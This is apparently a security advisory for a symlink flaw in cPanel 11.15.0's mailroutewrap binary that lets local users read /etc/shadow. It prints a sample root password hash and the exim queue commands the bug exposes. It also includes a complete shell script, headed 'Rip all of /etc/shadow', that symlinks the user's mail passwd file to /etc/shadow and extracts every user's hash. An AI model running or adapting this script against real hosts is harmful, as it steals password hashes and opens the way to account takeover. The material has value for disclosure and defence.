cPanel 11.15.0-RELEASE_18420 - local users could view any entry from /etc/shadow via mailroutewrap

DESCRIPTION

A symlink attack in /home/username/etc/mail/domain/shadow allowed any entry from /etc/shadow to be displayed to the user. The local user needed to have or create an email account that acted as a catch-all to take advantage of this issue.

[user@host ~]$ ./11.15.0-RELEASE_18420-view_any_line_from_etc_shadow.sh
root:$1$BxAWmn63$J4Iyx.3Ki6wtUo1NS7A2e/:14457:0:99999:7:::

This bug was initially discovered as a way for local users to effectively run exim -bp and exim -bpc via the following commands:

[user@host ~]$ /usr/local/cpanel/bin/mailroutewrap --bp
 37m   350 1MfI5k-00048d-Dk <user@example.com>
          user@example.com
[user@host ~]$ /usr/local/cpanel/bin/mailroutewrap --bpc
1

The symlink attack wasn't discovered until later, at which time the issue was reported.

IMPACT

Local users could obtain any entry of their choice from /etc/shadow, or execute the equivalent of exim -bp or exim -bpc.

#!/bin/sh

########################
#
# Rip all of /etc/shadow
#
########################

DOMAIN=`ls /home/$USER/etc | grep \\\. | head -1`

if [ -d /home/$USER/etc/$DOMAIN ] ; then
    cd /home/$USER/etc/$DOMAIN
else
    exit
fi

mv passwd passwd.orig 2>/dev/null
ln -s /etc/shadow passwd

for x in `cut -d : -f 1 /etc/passwd` ; do
    ENTRY=`/usr/local/cpanel/bin/mailroutewrap $x@$DOMAIN 2>&1 | \
	 grep 'lookup yielded:' | tail -1 | awk '{print $3}' ;`
    echo $x:$ENTRY
done

rm -f passwd
mv passwd.orig passwd 2>/dev/null